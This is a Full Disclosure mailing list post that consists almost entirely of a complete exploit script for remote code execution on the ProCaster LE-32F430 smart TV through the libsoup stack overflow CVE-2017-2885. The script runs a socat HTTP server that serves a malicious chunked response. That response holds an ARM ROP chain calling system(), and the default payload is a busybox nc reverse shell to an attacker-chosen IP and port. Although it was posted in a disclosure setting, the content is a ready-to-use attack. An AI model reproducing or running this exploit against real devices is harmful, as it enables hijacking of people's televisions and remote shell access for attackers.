[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20201204051544.GA14000@huumeet.info>
Date: Fri, 4 Dec 2020 07:15:44 +0200
From: def <def@...meet.info>
To: fulldisclosure@...lists.org
Subject: [FD] ProCaster LE-32F430 SmartTV RCE via libsoup/2.51.3 stack
overflow (CVE-2017-2885)
#!/bin/sh
# ProCaster LE-32F430 (NotSo)SmartTV remote code execution exploit through
# GStreamer souphttpsrc libsoup/2.51.3 HTTP stack overflow (CVE-2017-2885)
# ~ def <def@...meet.info> 2020-02-15 ................. 850day exploit lol
# Exploit payload: ret2libc system() nc reverse shell with a clean exit()
CMD="${CMD:-/bin/busybox nc ${IP:-192.168.1.100} ${PORT:-54321} -e /bin/sh}"
case "${1:-${ACTION:-httpd}}" in # By default, start socat-based exploit server
httpd)
# Check dependencies
for PROGRAM in socat python3 dd wc; do
if ! command -v "$PROGRAM" >/dev/null; then
printf "Missing dependency: %s\n" "$PROGRAM"
exit 1
fi
done
# Parse bind address and port
case "${ARG=${2:-${HTTPD_BIND:-0.0.0.0:12345}}}" in
*:*) HTTPD_ADDR="${ARG%:*}"; HTTPD_PORT="${ARG#*:}" ;;
*) printf "Bad httpd [IPv4:PORT] bind arg: %s\n" "$ARG"; exit 1 ;;
esac >&2
# Start socat HTTP server
printf "HTTP souploit.sh server @ %s:%d\n" "$HTTPD_ADDR" "$HTTPD_PORT"
printf "Exploit system() payload: %s\n" "$CMD"
exec socat -v -x \
TCP-LISTEN:"$HTTPD_PORT,reuseaddr,fork,bind=$HTTPD_ADDR" \
EXEC:"\\'$0\\' request"
;;
-h|--help|help) printf "Usage: %s httpd [IPv4:PORT]\n" "$0"; exit 0 ;;
request) set -e ;;
*) printf "Unsupported %s action: '%s'\n" "$0" "$1" >&2; exit 1 ;;
esac
# GStreamer souphttpsrc dislikes fragmented HTTP responses (so buffer them)
flush_stdout() {
exec 1>&3 3>&-
dd if=/tmp/$$.stdout bs="$(wc -c </tmp/$$.stdout)" count=1 2>/dev/null
rm -f /tmp/$$.stdout
}
exec 3>&1 1>/tmp/$$.stdout
trap flush_stdout EXIT
# Parse HTTP request
IFS="$(printf '\t\r\n ')"
TIME="$(date '+%Y-%m-%d %H:%M:%S%z')"
if read -r METHOD URL HTTP && [ -n "$METHOD" -a -n "$URL" -a -n "$HTTP" ]; then
printf "[%s] %s %s %s\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
while IFS="$IFS:" read -r KEY VALUE && [ -n "$KEY" -a -n "$VALUE" ]
do printf "[%s] %s: %s\n" "$TIME" "$KEY" "$VALUE"; done >&2
else
printf "[%s] '%s' '%s' '%s'\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
printf "HTTP/1.1 400 Bad Request\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Length: 0\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
fi
# Handle HTTP HEAD and GET
if [ "$METHOD" = "HEAD" ]; then
printf "HTTP/1.1 200 OK\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Type: %s\r\n" "${MIME:-"video/mp4"}"
printf "Content-Length: %d\r\n" "12345"
printf "Accept-Ranges: bytes\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
elif [ "$METHOD" != "GET" ]; then
printf "HTTP/1.1 405 Not Allowed\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Length: 0\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
fi
# Exploit payload
python3 -u - "$CMD" <<"EOF"
import sys, struct
command = sys.argv[1].encode() + b'\x00'
if len(command) > 108: raise Exception("Command length exceeds limit 108")
LE32, BE32 = lambda v: struct.pack('<I', v), lambda v: struct.pack('>I', v)
sys.stdout.buffer.write(b"".join([
#####################################
b"HTTP/1.1 206 OK\r\n", #
b"Transfer-Encoding: chunked\r\n", #
b"Connection: close\r\n", #
b"\r\n", #
#####################################
b"1\r\n", # start a chunk #
b">", # 4B alignment #
#####################################
LE32(0xAAAAAAAA), # padding #
LE32(0xBBBBBBBB), # padding #
LE32(0xCCCCCCCC), # padding #
#####################################
LE32(0x477B9C49), # (9) sym.exit
command.ljust(108), # system() command
LE32(0x4783A1E3), # (4) pc = add sp, 0x64; pop.w {r4, ..., r11, pc}
LE32(0x4784A7C7), # (7) r4 = ldr lr, [sp], 4; bx r3; bx lr
LE32(0x4783D287), # (2) r4 = mov r0, sp; blx r3
#####################################
BE32(0x01234567), # padding #
BE32(0x89ABCDEF), # padding #
#####################################
LE32(0x477C01E5), # (8) r8 = sym.system
LE32(0x477CF019), # (3) r8 = add sp, 0x6C; ldr pc, [sp], 4
LE32(0x478436F7), # (6) r10 = mov r3, r8; blx r4
LE32(0x478436F7), # (1) r10 = mov r3, r8; blx r4
LE32(0x477927A3), # (5) pc = sub sp, 0x98; bx r10
LE32(0x477927A3), # (0) pc = sub sp, 0x98; bx r10
#####################################
LE32(0x4787BB08), # valid pointer #
LE32(0x4787BB08), # valid pointer #
#####################################
b"\r\n" # payload EOF # 248B
#####################################
]))
EOF
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists